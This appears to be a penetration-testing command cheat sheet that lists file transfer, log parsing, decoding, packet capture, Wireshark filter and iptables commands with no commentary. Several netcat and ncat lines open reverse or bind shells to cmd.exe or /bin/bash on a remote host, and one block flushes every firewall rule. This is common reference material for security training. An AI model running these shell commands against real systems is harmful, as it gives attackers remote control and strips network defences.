Pull file from server
pscp root@127.0.0.1:/etc/myfolder/myfile.opt “C:\download files”
Send file to server
pscp filename.rpm root@127.0.0.1:/etc/myfolder/myfile.opt
Pull file from server
pscp root@127.0.0.1:/etc/myfolder/myfile.opt “C:\download files”
Send file to server
pscp filename.rpm root@127.0.0.1:/etc/myfolder/myfile.opt
$ip
system variableexport ip=192.168.1.100
locate sbd.exe
$PATH
environment variablewhich sbd
find / -name sbd\*
netstat -lntp
passwd
netstat -antp |grep apache
systemctl start ssh
systemctl start apache2
systemctl enable ssh
systemctl stop ssh
gunzip access.log.gz
tar -xzvf file.tar.gz
history | grep phrase_to_search_for
wget http://www.cisco.com
curl http://www.cisco.com
wc index.html
head index.html
tail index.html
grep "href=" index.html
grep "href=" index.html | cut -d "/" -f 3 | grep "\\." | cut -d '"' -f 1 | sort -u
cat index.html | grep -o 'http://\[^"\]\*' | cut -d "/" -f 3 | sort –u > list.txt
for url in $(cat list.txt); do host $url; done
cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn
echo -n "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" | base64 --decode
echo -n "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874" | xxd -r -ps
nc -nv $ip 110
nc -nlvp 4444
nc -nv $ip 4444
nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe
nc -nlvp 4444 > incoming.exe
whereis nc
nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz
/bin/nc.traditional -e /bin/bash 1.2.3.4 4444
nc.exe -nlvp 4444 -e cmd.exe
or
nc.exe -nv <Remote IP> <Remote Port> -e cmd.exe
nc -nv $ip 4444 -e /bin/bash
echo "" | nc -nv -w1 <IP Address> <Ports>
ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl
ncat -v $ip 4444 --ssl
tcp.port eq 25 or icmp
ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip
ip.addr == xxx.xxx.xxx.xxx
Equals
ip.src == xxx.xxx.xxx.xxx or ip.dst == xxx.xxx.xxx.xxx
ip.addr != xxx.xxx.xxx.xxx
Equals
ip.src != xxx.xxx.xxx.xxx or ip.dst != xxx.xxx.xxx.xxx
tcpdump -r passwordz.pcap
tcpdump -n -r passwordz.pcap | awk -F" " '{print $3}' | sort -u | head
tcpdump tcp port 80 -w output.pcap -i eth0
tcpdump -A -n 'tcp[13] = 24' -r passwordz.pcap
iptables -A INPUT -p tcp --destination-port 13327 ! -d $ip -j DROP
iptables -A INPUT -p tcp --destination-port 9991 ! -d $ip -j DROP
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
iptables -t nat -F
iptables -t mangle -F
iptables -F
iptables -X
iptables -t raw -F iptables -t raw -X